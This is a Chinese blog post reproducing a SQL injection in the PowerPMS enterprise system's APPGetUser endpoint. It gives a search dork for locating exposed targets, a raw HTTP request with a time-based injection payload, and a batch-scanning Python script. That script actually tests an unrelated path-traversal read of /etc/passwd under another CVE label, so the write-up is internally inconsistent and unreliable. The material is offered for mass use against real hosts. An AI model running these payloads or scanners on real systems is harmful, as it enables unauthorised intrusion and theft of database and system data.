【漏洞复现】普华-PowerPMS APPGetUser SQL注入漏洞

声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

PowerPMS 是一款综合性的企业管理系统,它集成了财务管理、销售管理、采购管理、仓储管理以及项目管理等多个功能模块。该系统采用模块化设计,可以根据企业的具体需求进行灵活的配置和二次开发。PowerPMS 拥有用户友好的界面和流畅的操作流程,能够帮助企业高效地管理各种业务活动。此外,系统还支持多公司、多仓库、多币种等高级功能,能够满足不同规模企业的管理需求。其接口**/APPAccount/APPGetUser?name=1**存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。

二、资产收集

1.使用网络空间测绘引擎搜索

**鹰图检索:"**PowerPMS用户登录"

2.使用poc批量扫描

python 复制代码
import urllib.request
import urllib3
from urllib.parse import urljoin,quote
import argparse
import ssl
import re

# 禁用SSL证书验证,允许不安全的请求
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    # 读取文件中的URL列表
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    # 移除URL末尾的斜杠
    url = url.rstrip("/")
    # 构造目标URL,尝试访问API文档中的敏感文件etc/passwd
    target = url+"/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd"
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36"
    }
    try:
        # 发送GET请求
        response = urllib.request.Request(target, headers=headers, method="GET", unverifiable=True)
        res = urllib.request.urlopen(response)
        status_code = res.getcode()
        content = res.read().decode()
        # 检查响应状态码和内容,判断是否成功读取到etc/passwd文件
        if status_code == 200 and 'root:' in content and 'var' in content:
            print(f"\033[31mDiscovered:{url}: Bazaar_CVE-2024-40348_ArbiraryFileRead!\033[0m")
            return True
    except Exception as e:
        print(e)

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        # 如果提供了单个URL,直接检查
        check(url)
    elif txt:
        # 如果提供了包含多个URL的文件,逐个检查
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        # 如果没有提供任何参数,显示帮助信息
        print("help")

cmd运行poc脚本:python poc.py -f host.txt

随机寻找的幸运儿

三、漏洞复现

1.构造数据包

1.构造数据包:

html 复制代码
GET /APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host:x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

2.数据包分析

  1. 请求行(Request Line):

    • 方法:GET
    • URI:/APPAccount/APPGetUser?name=1');WAITFOR+DELAY+'0:0:5'--
    • HTTP版本:HTTP/1.1
  2. 请求头(Headers):

    • Host:x.x.x.x
    • User-Agent:Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
    • Connection:close
  • 请求行中的方法是GET,表示这是一个获取资源的请求。
  • URI中包含了一个SQL注入攻击的尝试,其中';WAITFOR DELAY '0:0:5'--是SQL注入的一部分,用于在数据库中执行延迟操作。这种攻击可能会导致服务器响应缓慢或拒绝服务。
  • 请求头中的Host指定了目标服务器的地址。
  • User-Agent提供了客户端浏览器的信息,包括操作系统、浏览器类型和版本等。
  • Connection设置为close,表示客户端希望在收到响应后立即关闭连接。

3.结束跑路

1.构造数据包,延时5S

2.构造数据包,延时3秒

**每篇一言:**风月折断杨柳枝,琴瑟朝露挥掷成诗。

相关推荐
睡觉的时候不会困41 分钟前
Redis 主从复制详解:原理、配置与主从切换实战
数据库·redis·bootstrap
Broken Arrows2 小时前
Linux学习——管理网络安全(二十一)
linux·学习·web安全
程序员的世界你不懂2 小时前
【Flask】测试平台开发,新增说明书编写和展示功能 第二十三篇
java·前端·数据库
索迪迈科技2 小时前
网络请求库——Axios库深度解析
前端·网络·vue.js·北京百思可瑞教育·百思可瑞教育
自学也学好编程2 小时前
【数据库】Redis详解:内存数据库与缓存之王
数据库·redis
JAVA不会写3 小时前
在Mybatis plus中如何使用自定义Sql
数据库·sql
IT 小阿姨(数据库)3 小时前
PgSQL监控死元组和自动清理状态的SQL语句执行报错ERROR: division by zero原因分析和解决方法
linux·运维·数据库·sql·postgresql·centos
grrrr_14 小时前
【工具类】Nuclei YAML POC 编写以及批量检测
网络·安全·web安全
ChinaRainbowSea4 小时前
7. LangChain4j + 记忆缓存详细说明
java·数据库·redis·后端·缓存·langchain·ai编程
骥龙4 小时前
XX汽集团数字化转型:全生命周期网络安全、数据合规与AI工业物联网融合实践
人工智能·物联网·web安全